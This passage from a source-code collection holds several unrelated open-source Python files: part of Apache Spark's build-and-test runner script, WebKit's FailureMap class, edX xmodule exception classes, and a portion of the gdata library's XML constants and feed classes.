"""Given a valid java executable will return its version in named tuple format
with accessors '.major', '.minor', '.patch', '.update'"""
raw_output = subprocess.check_output([java_exe, "-version"],
stderr=subprocess.STDOUT,
universal_newlines=True)
raw_output_lines = raw_output.split('\n')
# find raw version string, eg 'java version "1.8.0_25"'
raw_version_str = next(x for x in raw_output_lines if " version " in x)
match = re.search('(\d+)\.(\d+)\.(\d+)', raw_version_str)
major = int(match.group(1))
minor = int(match.group(2))
patch = int(match.group(3))
return JavaVersion(major, minor, patch)
# -------------------------------------------------------------------------------------------------
# Functions for running the other build and test scripts
# -------------------------------------------------------------------------------------------------
def set_title_and_block(title, err_block):
os.environ["CURRENT_BLOCK"] = str(ERROR_CODES[err_block])
line_str = '=' * 72
print('')
print(line_str)
print(title)
print(line_str)
def run_apache_rat_checks():
set_title_and_block("Running Apache RAT checks", "BLOCK_RAT")
run_cmd([os.path.join(SPARK_HOME, "dev", "check-license")])
def run_scala_style_checks():
set_title_and_block("Running Scala style checks", "BLOCK_SCALA_STYLE")
run_cmd([os.path.join(SPARK_HOME, "dev", "lint-scala")])
def run_java_style_checks():
set_title_and_block("Running Java style checks", "BLOCK_JAVA_STYLE")
run_cmd([os.path.join(SPARK_HOME, "dev", "lint-java")])
def run_python_style_checks():
set_title_and_block("Running Python style checks", "BLOCK_PYTHON_STYLE")
run_cmd([os.path.join(SPARK_HOME, "dev", "lint-python")])
def run_sparkr_style_checks():
set_title_and_block("Running R style checks", "BLOCK_R_STYLE")
if which("R"):
# R style check should be executed after `install-dev.sh`.
# Since warnings about `no visible global function definition` appear
# without the installation. SEE ALSO: SPARK-9121.
run_cmd([os.path.join(SPARK_HOME, "dev", "lint-r")])
else:
print("Ignoring SparkR style check as R was not found in PATH")
def build_spark_documentation():
set_title_and_block("Building Spark Documentation", "BLOCK_DOCUMENTATION")
os.environ["PRODUCTION"] = "1 jekyll build"
os.chdir(os.path.join(SPARK_HOME, "docs"))
jekyll_bin = which("jekyll")
if not jekyll_bin:
print("[error] Cannot find a version of `jekyll` on the system; please",
" install one and retry to build documentation.")
sys.exit(int(os.environ.get("CURRENT_BLOCK", 255)))
else:
run_cmd([jekyll_bin, "build"])
os.chdir(SPARK_HOME)
def get_zinc_port():
"""
Get a randomized port on which to start Zinc
"""
return random.randrange(3030, 4030)
def kill_zinc_on_port(zinc_port):
"""
Kill the Zinc process running on the given port, if one exists.
"""
cmd = ("/usr/sbin/lsof -P |grep %s | grep LISTEN "
"| awk '{ print $2; }' | xargs kill") % zinc_port
subprocess.check_call(cmd, shell=True)
def exec_maven(mvn_args=()):
"""Will call Maven in the current directory with the list of mvn_args passed
in and returns the subprocess for any further processing"""
zinc_port = get_zinc_port()
os.environ["ZINC_PORT"] = "%s" % zinc_port
zinc_flag = "-DzincPort=%s" % zinc_port
flags = [os.path.join(SPARK_HOME, "build", "mvn"), "--force", zinc_flag]
run_cmd(flags + mvn_args)
kill_zinc_on_port(zinc_port)
def exec_sbt(sbt_args=()):
"""Will call SBT in the current directory with the list of mvn_args passed
in and returns the subprocess for any further processing"""
sbt_cmd = [os.path.join(SPARK_HOME, "build", "sbt")] + sbt_args
sbt_output_filter = re.compile("^.*[info].*Resolving" + "|" +
"^.*[warn].*Merging" + "|" +
"^.*[info].*Including")
# NOTE: echo "q" is needed because sbt on encountering a build file
# with failure (either resolution or compilation) prompts the user for
# input either q, r, etc to quit or retry. This echo is there to make it
# not block.
echo_proc = subprocess.Popen(["echo", "\"q\n\""], stdout=subprocess.PIPE)
sbt_proc = subprocess.Popen(sbt_cmd,
stdin=echo_proc.stdout,
stdout=subprocess.PIPE)
echo_proc.wait()
for line in iter(sbt_proc.stdout.readline, ''):
if not sbt_output_filter.match(line):
print(line, end='')
retcode = sbt_proc.wait()
if retcode != 0:
exit_from_command_with_retcode(sbt_cmd, retcode)
def get_hadoop_profiles(hadoop_version):
"""
For the given Hadoop version tag, return a list of Maven/SBT profile flags for
building and testing against that Hadoop version.
"""
sbt_maven_hadoop_profiles = {
"hadoop2.6": ["-Phadoop-2.6"],
"hadoop2.7": ["-Phadoop-2.7"],
}
if hadoop_version in sbt_maven_hadoop_profiles:
return sbt_maven_hadoop_profiles[hadoop_version]
else:
print("[error] Could not find", hadoop_version, "in the list. Valid options",
" are", sbt_maven_hadoop_profiles.keys())
sys.exit(int(os.environ.get("CURRENT_BLOCK", 255)))
def build_spark_maven(hadoop_version):
# Enable all of the profiles for the build:
build_profiles = get_hadoop_profiles(hadoop_version) + modules.root.build_profile_flags
mvn_goals = ["clean", "package", "-DskipTests"]
profiles_and_goals = build_profiles + mvn_goals
print("[info] Building Spark (w/Hive 1.2.1) using Maven with these arguments: ",
" ".join(profiles_and_goals))
exec_maven(profiles_and_goals)
def build_spark_sbt(hadoop_version):
# Enable all of the profiles for the build:
build_profiles = get_hadoop_profiles(hadoop_version) + modules.root.build_profile_flags
sbt_goals = ["test:package", # Build test jars as some tests depend on them
"streaming-kafka-0-8-assembly/assembly",
"streaming-flume-assembly/assembly",
"streaming-kinesis-asl-assembly/assembly"]
profiles_and_goals = build_profiles + sbt_goals
print("[info] Building Spark (w/Hive 1.2.1) using SBT with these arguments: ",
" ".join(profiles_and_goals))
exec_sbt(profiles_and_goals)
def build_spark_unidoc_sbt(hadoop_version):
set_title_and_block("Building Unidoc API Documentation", "BLOCK_DOCUMENTATION")
# Enable all of the profiles for the build:
build_profiles = get_hadoop_profiles(hadoop_version) + modules.root.build_profile_flags
sbt_goals = ["unidoc"]
profiles_and_goals = build_profiles + sbt_goals
print("[info] Building Spark unidoc (w/Hive 1.2.1) using SBT with these arguments: ",
" ".join(profiles_and_goals))
exec_sbt(profiles_and_goals)
def build_spark_assembly_sbt(hadoop_version):
# Enable all of the profiles for the build:
build_profiles = get_hadoop_profiles(hadoop_version) + modules.root.build_profile_flags
sbt_goals = ["assembly/package"]
profiles_and_goals = build_profiles + sbt_goals
print("[info] Building Spark assembly (w/Hive 1.2.1) using SBT with these arguments: ",
" ".join(profiles_and_goals))
exec_sbt(profiles_and_goals)
# Note that we skip Unidoc build only if Hadoop 2.6 is explicitly set in this SBT build.
# Due to a different dependency resolution in SBT & Unidoc by an unknown reason, the
# documentation build fails on a specific machine & environment in Jenkins but it was unable
# to reproduce. Please see SPARK-20343. This is a band-aid fix that should be removed in
# the future.
is_hadoop_version_2_6 = os.environ.get("AMPLAB_JENKINS_BUILD_PROFILE") == "hadoop2.6"
if not is_hadoop_version_2_6:
# Make sure that Java and Scala API documentation can be generated
build_spark_unidoc_sbt(hadoop_version)
def build_apache_spark(build_tool, hadoop_version):
"""Will build Spark against Hive v1.2.1 given the passed in build tool (either `sbt` or
`maven`). Defaults to using `sbt`."""
set_title_and_block("Building Spark", "BLOCK_BUILD")
rm_r("lib_managed")
if build_tool == "maven":
build_spark_maven(hadoop_version)
else:
build_spark_sbt(hadoop_version)
def detect_binary_inop_with_mima(hadoop_version):
build_profiles = get_hadoop_profiles(hadoop_version) + modules.root.build_profile_flags
set_title_and_block("Detecting binary incompatibilities with MiMa", "BLOCK_MIMA")
run_cmd([os.path.join(SPARK_HOME, "dev", "mima")] + build_profiles)
def run_scala_tests_maven(test_profiles):
mvn_test_goals = ["test", "--fail-at-end"]
profiles_and_goals = test_profiles + mvn_test_goals
print("[info] Running Spark tests using Maven with these arguments: ",
" ".join(profiles_and_goals))
exec_maven(profiles_and_goals)
def run_scala_tests_sbt(test_modules, test_profiles):
sbt_test_goals = list(itertools.chain.from_iterable(m.sbt_test_goals for m in test_modules))
if not sbt_test_goals:
return
profiles_and_goals = test_profiles + sbt_test_goals
print("[info] Running Spark tests using SBT with these arguments: ",
" ".join(profiles_and_goals))
exec_sbt(profiles_and_goals)
def run_scala_tests(build_tool, hadoop_version, test_modules, excluded_tags):
"""Function to properly execute all tests passed in as a set from the
`determine_test_suites` function"""
set_title_and_block("Running Spark unit tests", "BLOCK_SPARK_UNIT_TESTS")
test_modules = set(test_modules)
test_profiles = get_hadoop_profiles(hadoop_version) + \
list(set(itertools.chain.from_iterable(m.build_profile_flags for m in test_modules)))
if excluded_tags:
test_profiles += ['-Dtest.exclude.tags=' + ",".join(excluded_tags)]
if build_tool == "maven":
run_scala_tests_maven(test_profiles)
else:
run_scala_tests_sbt(test_modules, test_profiles)
def run_python_tests(test_modules, parallelism):
set_title_and_block("Running PySpark tests", "BLOCK_PYSPARK_UNIT_TESTS")
command = [os.path.join(SPARK_HOME, "python", "run-tests")]
if test_modules != [modules.root]:
command.append("--modules=%s" % ','.join(m.name for m in test_modules))
command.append("--parallelism=%i" % parallelism)
run_cmd(command)
def run_python_packaging_tests():
set_title_and_block("Running PySpark packaging tests", "BLOCK_PYSPARK_PIP_TESTS")
command = [os.path.join(SPARK_HOME, "dev", "run-pip-tests")]
run_cmd(command)
def run_build_tests():
set_title_and_block("Running build tests", "BLOCK_BUILD_TESTS")
run_cmd([os.path.join(SPARK_HOME, "dev", "test-dependencies.sh")])
pass
def run_sparkr_tests():
set_title_and_block("Running SparkR tests", "BLOCK_SPARKR_UNIT_TESTS")
if which("R"):
run_cmd([os.path.join(SPARK_HOME, "R", "run-tests.sh")])
else:
print("Ignoring SparkR tests as R was not found in PATH")
def parse_opts():
parser = OptionParser(
prog="run-tests"
)
parser.add_option(
"-p", "--parallelism", type="int", default=4,
help="The number of suites to test in parallel (default %default)"
)
(opts, args) = parser.parse_args()
if args:
parser.error("Unsupported arguments: %s" % ' '.join(args))
if opts.parallelism < 1:
parser.error("Parallelism cannot be less than 1")
return opts
def main():
opts = parse_opts()
# Ensure the user home directory (HOME) is valid and is an absolute directory
if not USER_HOME or not os.path.isabs(USER_HOME):
print("[error] Cannot determine your home directory as an absolute path;",
" ensure the $HOME environment variable is set properly.")
sys.exit(1)
os.chdir(SPARK_HOME)
rm_r(os.path.join(SPARK_HOME, "work"))
rm_r(os.path.join(USER_HOME, ".ivy2", "local", "org.apache.spark"))
rm_r(os.path.join(USER_HOME, ".ivy2", "cache", "org.apache.spark"))
os.environ["CURRENT_BLOCK"] = str(ERROR_CODES["BLOCK_GENERAL"])
java_exe = determine_java_executable()
if not java_exe:
print("[error] Cannot find a version of `java` on the system; please",
" install one and retry.")
sys.exit(2)
java_version = determine_java_version(java_exe)
# install SparkR
if which("R"):
run_cmd([os.path.join(SPARK_HOME, "R", "install-dev.sh")])
else:
print("Cannot install SparkR as R was not found in PATH")
if os.environ.get("AMPLAB_JENKINS"):
# if we're on the Amplab Jenkins build servers setup variables
# to reflect the environment settings
build_tool = os.environ.get("AMPLAB_JENKINS_BUILD_TOOL", "sbt")
hadoop_version = os.environ.get("AMPLAB_JENKINS_BUILD_PROFILE", "hadoop2.6")
test_env = "amplab_jenkins"
# add path for Python3 in Jenkins if we're calling from a Jenkins machine
os.environ["PATH"] = "/home/anaconda/envs/py3k/bin:" + os.environ.get("PATH")
else:
# else we're running locally and can use local settings
build_tool = "sbt"
hadoop_version = os.environ.get("HADOOP_PROFILE", "hadoop2.6")
test_env = "local"
print("[info] Using build tool", build_tool, "with Hadoop profile", hadoop_version,
"under environment", test_env)
changed_modules = None
changed_files = None
if test_env == "amplab_jenkins" and os.environ.get("AMP_JENKINS_PRB"):
target_branch = os.environ["ghprbTargetBranch"]
changed_files = identify_changed_files_from_git_commits("HEAD", target_branch=target_branch)
changed_modules = determine_modules_for_files(changed_files)
excluded_tags = determine_tags_to_exclude(changed_modules)
if not changed_modules:
changed_modules = [modules.root]
excluded_tags = []
print("[info] Found the following changed modules:",
", ".join(x.name for x in changed_modules))
# setup environment variables
# note - the 'root' module doesn't collect environment variables for all modules. Because the
# environment variables should not be set if a module is not changed, even if running the 'root'
# module. So here we should use changed_modules rather than test_modules.
test_environ = {}
for m in changed_modules:
test_environ.update(m.environ)
setup_test_environ(test_environ)
test_modules = determine_modules_to_test(changed_modules)
# license checks
run_apache_rat_checks()
# style checks
if not changed_files or any(f.endswith(".scala")
or f.endswith("scalastyle-config.xml")
for f in changed_files):
run_scala_style_checks()
if not changed_files or any(f.endswith(".java")
or f.endswith("checkstyle.xml")
or f.endswith("checkstyle-suppressions.xml")
for f in changed_files):
# run_java_style_checks()
pass
if not changed_files or any(f.endswith(".py") for f in changed_files):
run_python_style_checks()
if not changed_files or any(f.endswith(".R") for f in changed_files):
run_sparkr_style_checks()
# determine if docs were changed and if we're inside the amplab environment
# note - the below commented out until *all* Jenkins workers can get `jekyll` installed
# if "DOCS" in changed_modules and test_env == "amplab_jenkins":
# build_spark_documentation()
if any(m.should_run_build_tests for m in test_modules):
run_build_tests()
# spark build
build_apache_spark(build_tool, hadoop_version)
# backwards compatibility checks
if build_tool == "sbt":
# Note: compatibility tests only supported in sbt for now
detect_binary_inop_with_mima(hadoop_version)
# Since we did not build assembly/package before running dev/mima, we need to
# do it here because the tests still rely on it; see SPARK-13294 for details.
build_spark_assembly_sbt(hadoop_version)
# run the test suites
run_scala_tests(build_tool, hadoop_version, test_modules, excluded_tags)
modules_with_python_tests = [m for m in test_modules if m.python_test_goals]
if modules_with_python_tests:
run_python_tests(modules_with_python_tests, opts.parallelism)
run_python_packaging_tests()
if any(m.should_run_r_tests for m in test_modules):
run_sparkr_tests()
def _test():
import doctest
failure_count = doctest.testmod()[0]
if failure_count:
exit(-1)
if __name__ == "__main__":
_test()
main()
| apache-2.0 |
webmull/phantomjs | src/qt/qtwebkit/Tools/Scripts/webkitpy/common/net/failuremap.py | 134 | 4062 | # Copyright (C) 2010 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# FIXME: This probably belongs in the buildbot module.
class FailureMap(object):
def __init__(self):
self._failures = []
def add_regression_window(self, builder, regression_window):
self._failures.append({
'builder': builder,
'regression_window': regression_window,
})
def is_empty(self):
return not self._failures
def failing_revisions(self):
failing_revisions = [failure_info['regression_window'].revisions()
for failure_info in self._failures]
return sorted(set(sum(failing_revisions, [])))
def builders_failing_for(self, revision):
return self._builders_failing_because_of([revision])
def tests_failing_for(self, revision):
tests = [failure_info['regression_window'].failing_tests()
for failure_info in self._failures
if revision in failure_info['regression_window'].revisions()
and failure_info['regression_window'].failing_tests()]
result = set()
for test in tests:
result = result.union(test)
return sorted(result)
def failing_tests(self):
return set(sum([self.tests_failing_for(revision) for revision in self.failing_revisions()], []))
def _old_failures(self, is_old_failure):
return filter(lambda revision: is_old_failure(revision),
self.failing_revisions())
def _builders_failing_because_of(self, revisions):
revision_set = set(revisions)
return [failure_info['builder'] for failure_info in self._failures
if revision_set.intersection(
failure_info['regression_window'].revisions())]
# FIXME: We should re-process old failures after some time delay.
# https://bugs.webkit.org/show_bug.cgi?id=36581
def filter_out_old_failures(self, is_old_failure):
old_failures = self._old_failures(is_old_failure)
old_failing_builder_names = set([builder.name()
for builder in self._builders_failing_because_of(old_failures)])
# We filter out all the failing builders that could have been caused
# by old_failures. We could miss some new failures this way, but
# emperically, this reduces the amount of spam we generate.
failures = self._failures
self._failures = [failure_info for failure_info in failures
if failure_info['builder'].name() not in old_failing_builder_names]
self._cache = {}
| bsd-3-clause |
gymnasium/edx-platform | common/lib/xmodule/xmodule/exceptions.py | 22 | 1266 | class InvalidDefinitionError(Exception):
pass
class NotFoundError(Exception):
pass
class ProcessingError(Exception):
'''
An error occurred while processing a request to the XModule.
For example: if an exception occurs while checking a capa problem.
'''
pass
class InvalidVersionError(Exception):
"""
Tried to save an item with a location that a store cannot support (e.g., draft version
for a non-leaf node)
"""
def __init__(self, location):
super(InvalidVersionError, self).__init__()
self.location = location
class SerializationError(Exception):
"""
Thrown when a module cannot be exported to XML
"""
def __init__(self, location, msg):
super(SerializationError, self).__init__(msg)
self.location = location
class UndefinedContext(Exception):
"""
Tried to access an xmodule field which needs a different context (runtime) to have a value.
"""
pass
class HeartbeatFailure(Exception):
"""
Raised when heartbeat fails.
"""
def __init__(self, msg, service):
"""
In addition to a msg, provide the name of the service.
"""
self.service = service
super(HeartbeatFailure, self).__init__(msg)
| agpl-3.0 |
pforret/python-for-android | python3-alpha/python-libs/gdata/data.py | 127 | 39947 | #!/usr/bin/env python
#
# Copyright (C) 2009 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This module is used for version 2 of the Google Data APIs.
"""Provides classes and constants for the XML in the Google Data namespace.
Documentation for the raw XML which these classes represent can be found here:
http://code.google.com/apis/gdata/docs/2.0/elements.html
"""
__author__ = 'j.s@google.com (Jeff Scudder)'
import os
import atom.core
import atom.data
GDATA_TEMPLATE = '{http://schemas.google.com/g/2005}%s'
GD_TEMPLATE = GDATA_TEMPLATE
OPENSEARCH_TEMPLATE_V1 = '{http://a9.com/-/spec/opensearchrss/1.0/}%s'
OPENSEARCH_TEMPLATE_V2 = '{http://a9.com/-/spec/opensearch/1.1/}%s'
BATCH_TEMPLATE = '{http://schemas.google.com/gdata/batch}%s'
# Labels used in batch request entries to specify the desired CRUD operation.
BATCH_INSERT = 'insert'
BATCH_UPDATE = 'update'
BATCH_DELETE = 'delete'
BATCH_QUERY = 'query'
EVENT_LOCATION = 'http://schemas.google.com/g/2005#event'
ALTERNATE_LOCATION = 'http://schemas.google.com/g/2005#event.alternate'
PARKING_LOCATION = 'http://schemas.google.com/g/2005#event.parking'
CANCELED_EVENT = 'http://schemas.google.com/g/2005#event.canceled'
CONFIRMED_EVENT = 'http://schemas.google.com/g/2005#event.confirmed'
TENTATIVE_EVENT = 'http://schemas.google.com/g/2005#event.tentative'
CONFIDENTIAL_EVENT = 'http://schemas.google.com/g/2005#event.confidential'
DEFAULT_EVENT = 'http://schemas.google.com/g/2005#event.default'
PRIVATE_EVENT = 'http://schemas.google.com/g/2005#event.private'
PUBLIC_EVENT = 'http://schemas.google.com/g/2005#event.public'
OPAQUE_EVENT = 'http://schemas.google.com/g/2005#event.opaque'
TRANSPARENT_EVENT = 'http://schemas.google.com/g/2005#event.transparent'
CHAT_MESSAGE = 'http://schemas.google.com/g/2005#message.chat'
INBOX_MESSAGE = 'http://schemas.google.com/g/2005#message.inbox'
SENT_MESSAGE = 'http://schemas.google.com/g/2005#message.sent'
SPAM_MESSAGE = 'http://schemas.google.com/g/2005#message.spam'
STARRED_MESSAGE = 'http://schemas.google.com/g/2005#message.starred'
UNREAD_MESSAGE = 'http://schemas.google.com/g/2005#message.unread'
BCC_RECIPIENT = 'http://schemas.google.com/g/2005#message.bcc'
CC_RECIPIENT = 'http://schemas.google.com/g/2005#message.cc'
SENDER = 'http://schemas.google.com/g/2005#message.from'
REPLY_TO = 'http://schemas.google.com/g/2005#message.reply-to'
TO_RECIPIENT = 'http://schemas.google.com/g/2005#message.to'
ASSISTANT_REL = 'http://schemas.google.com/g/2005#assistant'
CALLBACK_REL = 'http://schemas.google.com/g/2005#callback'
CAR_REL = 'http://schemas.google.com/g/2005#car'
COMPANY_MAIN_REL = 'http://schemas.google.com/g/2005#company_main'
FAX_REL = 'http://schemas.google.com/g/2005#fax'
HOME_REL = 'http://schemas.google.com/g/2005#home'
HOME_FAX_REL = 'http://schemas.google.com/g/2005#home_fax'
ISDN_REL = 'http://schemas.google.com/g/2005#isdn'
MAIN_REL = 'http://schemas.google.com/g/2005#main'
MOBILE_REL = 'http://schemas.google.com/g/2005#mobile'
OTHER_REL = 'http://schemas.google.com/g/2005#other'
OTHER_FAX_REL = 'http://schemas.google.com/g/2005#other_fax'
PAGER_REL = 'http://schemas.google.com/g/2005#pager'
RADIO_REL = 'http://schemas.google.com/g/2005#radio'
TELEX_REL = 'http://schemas.google.com/g/2005#telex'
TTL_TDD_REL = 'http://schemas.google.com/g/2005#tty_tdd'
WORK_REL = 'http://schemas.google.com/g/2005#work'
WORK_FAX_REL = 'http://schemas.google.com/g/2005#work_fax'
WORK_MOBILE_REL = 'http://schemas.google.com/g/2005#work_mobile'
WORK_PAGER_REL = 'http://schemas.google.com/g/2005#work_pager'
NETMEETING_REL = 'http://schemas.google.com/g/2005#netmeeting'
OVERALL_REL = 'http://schemas.google.com/g/2005#overall'
PRICE_REL = 'http://schemas.google.com/g/2005#price'
QUALITY_REL = 'http://schemas.google.com/g/2005#quality'
EVENT_REL = 'http://schemas.google.com/g/2005#event'
EVENT_ALTERNATE_REL = 'http://schemas.google.com/g/2005#event.alternate'
EVENT_PARKING_REL = 'http://schemas.google.com/g/2005#event.parking'
AIM_PROTOCOL = 'http://schemas.google.com/g/2005#AIM'
MSN_PROTOCOL = 'http://schemas.google.com/g/2005#MSN'
YAHOO_MESSENGER_PROTOCOL = 'http://schemas.google.com/g/2005#YAHOO'
SKYPE_PROTOCOL = 'http://schemas.google.com/g/2005#SKYPE'
QQ_PROTOCOL = 'http://schemas.google.com/g/2005#QQ'
GOOGLE_TALK_PROTOCOL = 'http://schemas.google.com/g/2005#GOOGLE_TALK'
ICQ_PROTOCOL = 'http://schemas.google.com/g/2005#ICQ'
JABBER_PROTOCOL = 'http://schemas.google.com/g/2005#JABBER'
REGULAR_COMMENTS = 'http://schemas.google.com/g/2005#regular'
REVIEW_COMMENTS = 'http://schemas.google.com/g/2005#reviews'
MAIL_BOTH = 'http://schemas.google.com/g/2005#both'
MAIL_LETTERS = 'http://schemas.google.com/g/2005#letters'
MAIL_PARCELS = 'http://schemas.google.com/g/2005#parcels'
MAIL_NEITHER = 'http://schemas.google.com/g/2005#neither'
GENERAL_ADDRESS = 'http://schemas.google.com/g/2005#general'
LOCAL_ADDRESS = 'http://schemas.google.com/g/2005#local'
OPTIONAL_ATENDEE = 'http://schemas.google.com/g/2005#event.optional'
REQUIRED_ATENDEE = 'http://schemas.google.com/g/2005#event.required'
ATTENDEE_ACCEPTED = 'http://schemas.google.com/g/2005#event.accepted'
ATTENDEE_DECLINED = 'http://schemas.google.com/g/2005#event.declined'
ATTENDEE_INVITED = 'http://schemas.google.com/g/2005#event.invited'
ATTENDEE_TENTATIVE = 'http://schemas.google.com/g/2005#event.tentative'
FULL_PROJECTION = 'full'
VALUES_PROJECTION = 'values'
BASIC_PROJECTION = 'basic'
PRIVATE_VISIBILITY = 'private'
PUBLIC_VISIBILITY = 'public'
OPAQUE_TRANSPARENCY = 'http://schemas.google.com/g/2005#event.opaque'
TRANSPARENT_TRANSPARENCY = 'http://schemas.google.com/g/2005#event.transparent'
CONFIDENTIAL_EVENT_VISIBILITY = 'http://schemas.google.com/g/2005#event.confidential'
DEFAULT_EVENT_VISIBILITY = 'http://schemas.google.com/g/2005#event.default'
PRIVATE_EVENT_VISIBILITY = 'http://schemas.google.com/g/2005#event.private'
PUBLIC_EVENT_VISIBILITY = 'http://schemas.google.com/g/2005#event.public'
CANCELED_EVENT_STATUS = 'http://schemas.google.com/g/2005#event.canceled'
CONFIRMED_EVENT_STATUS = 'http://schemas.google.com/g/2005#event.confirmed'
TENTATIVE_EVENT_STATUS = 'http://schemas.google.com/g/2005#event.tentative'
ACL_REL = 'http://schemas.google.com/acl/2007#accessControlList'
class Error(Exception):
pass
class MissingRequiredParameters(Error):
pass
class LinkFinder(atom.data.LinkFinder):
"""Mixin used in Feed and Entry classes to simplify link lookups by type.
Provides lookup methods for edit, edit-media, post, ACL and other special
links which are common across Google Data APIs.
"""
def find_html_link(self):
"""Finds the first link with rel of alternate and type of text/html."""
for link in self.link:
if link.rel == 'alternate' and link.type == 'text/html':
return link.href
return None
FindHtmlLink = find_html_link
def get_html_link(self):
for a_link in self.link:
if a_link.rel == 'alternate' and a_link.type == 'text/html':
return a_link
return None
GetHtmlLink = get_html_link
def find_post_link(self):
"""Get the URL to which new entries should be POSTed.
The POST target URL is used to insert new entries.
Returns:
A str for the URL in the link with a rel matching the POST type.
"""
return self.find_url('http://schemas.google.com/g/2005#post')
FindPostLink = find_post_link
def get_post_link(self):
return self.get_link('http://schemas.google.com/g/2005#post')
GetPostLink = get_post_link
def find_acl_link(self):
acl_link = self.get_acl_link()
if acl_link:
return acl_link.href
return None
FindAclLink = find_acl_link
def get_acl_link(self):
"""Searches for a link or feed_link (if present) with the rel for ACL."""
acl_link = self.get_link(ACL_REL)
if acl_link:
return acl_link
elif hasattr(self, 'feed_link'):
for a_feed_link in self.feed_link:
if a_feed_link.rel == ACL_REL:
return a_feed_link
return None
GetAclLink = get_acl_link
def find_feed_link(self):
return self.find_url('http://schemas.google.com/g/2005#feed')
FindFeedLink = find_feed_link
def get_feed_link(self):
return self.get_link('http://schemas.google.com/g/2005#feed')
GetFeedLink = get_feed_link
def find_previous_link(self):
return self.find_url('previous')
FindPreviousLink = find_previous_link
def get_previous_link(self):
return self.get_link('previous')
GetPreviousLink = get_previous_link
class TotalResults(atom.core.XmlElement):
"""opensearch:TotalResults for a GData feed."""
_qname = (OPENSEARCH_TEMPLATE_V1 % 'totalResults',
OPENSEARCH_TEMPLATE_V2 % 'totalResults')
class StartIndex(atom.core.XmlElement):
"""The opensearch:startIndex element in GData feed."""
_qname = (OPENSEARCH_TEMPLATE_V1 % 'startIndex',
OPENSEARCH_TEMPLATE_V2 % 'startIndex')
class ItemsPerPage(atom.core.XmlElement):
"""The opensearch:itemsPerPage element in GData feed."""
_qname = (OPENSEARCH_TEMPLATE_V1 % 'itemsPerPage',
OPENSEARCH_TEMPLATE_V2 % 'itemsPerPage')
class ExtendedProperty(atom.core.XmlElement):
"""The Google Data extendedProperty element.
Used to store arbitrary key-value information specific to your
application. The value can either be a text string stored as an XML
attribute (.value), or an XML node (XmlBlob) as a child element.
This element is used in the Google Calendar data API and the Google
Contacts data API.
"""
_qname = GDATA_TEMPLATE % 'extendedProperty'
name = 'name'
value = 'value'
def get_xml_blob(self):
"""Returns the XML blob as an atom.core.XmlElement.
Returns:
An XmlElement representing the blob's XML, or None if no
blob was set.
"""
if self._other_elements:
return self._other_elements[0]
else:
return None
GetXmlBlob = get_xml_blob
def set_xml_blob(self, blob):
"""Sets the contents of the extendedProperty to XML as a child node.
Since the extendedProperty is only allowed one child element as an XML
blob, setting the XML blob will erase any preexisting member elements
in this object.
Args:
blob: str or atom.core.XmlElement representing the XML blob stored in
the extendedProperty.
"""
# Erase any existing extension_elements, clears the child nodes from the
# extendedProperty.
if isinstance(blob, atom.core.XmlElement):
self._other_elements = [blob]
else:
self._other_elements = [atom.core.parse(str(blob))]
SetXmlBlob = set_xml_blob
class GDEntry(atom.data.Entry, LinkFinder):
"""Extends Atom Entry to provide data processing"""
etag = '{http://schemas.google.com/g/2005}etag'
def get_id(self):
if self.id is not None and self.id.text is not None:
return self.id.text.strip()
return None
GetId = get_id
def is_media(self):
if self.find_edit_media_link():
return True
return False
IsMedia = is_media
def find_media_link(self):
"""Returns the URL to the media content, if the entry is a media entry.
Otherwise returns None.
"""
if self.is_media():
return self.content.src
return None
FindMediaLink = find_media_link
class GDFeed(atom.data.Feed, LinkFinder):
"""A Feed from a GData service."""
etag = '{http://schemas.google.com/g/2005}etag'
total_results = TotalResults
start_index = StartIndex
items_per_page = ItemsPerPage
entry = [GDEntry]
def get_id(self):
if self.id is not None and self.id.text is not None:
return self.id.text.strip()
return None
GetId = get_id
def get_generator(self):
if self.generator and self.generator.text:
return self.generator.text.strip()
return None
class BatchId(atom.core.XmlElement):
"""Identifies a single operation in a batch request."""
_qname = BATCH_TEMPLATE % 'id'
class BatchOperation(atom.core.XmlElement):
"""The CRUD operation which this batch entry represents."""
_qname = BATCH_TEMPLATE % 'operation'
type = 'type'
class BatchStatus(atom.core.XmlElement):
"""The batch:status element present in a batch response entry.
A status element contains the code (HTTP response code) and
reason as elements. In a single request these fields would
be part of the HTTP response, but in a batch request each
Entry operation has a corresponding Entry in the response
feed which includes status information.
See http://code.google.com/apis/gdata/batch.html#Handling_Errors
"""
_qname = BATCH_TEMPLATE % 'status'
code = 'code'
reason = 'reason'
content_type = 'content-type'
class BatchEntry(GDEntry):
"""An atom:entry for use in batch requests.
The BatchEntry contains additional members to specify the operation to be
performed on this entry and a batch ID so that the server can reference
individual operations in the response feed. For more information, see:
http://code.google.com/apis/gdata/batch.html
"""
batch_operation = BatchOperation
batch_id = BatchId
batch_status = BatchStatus
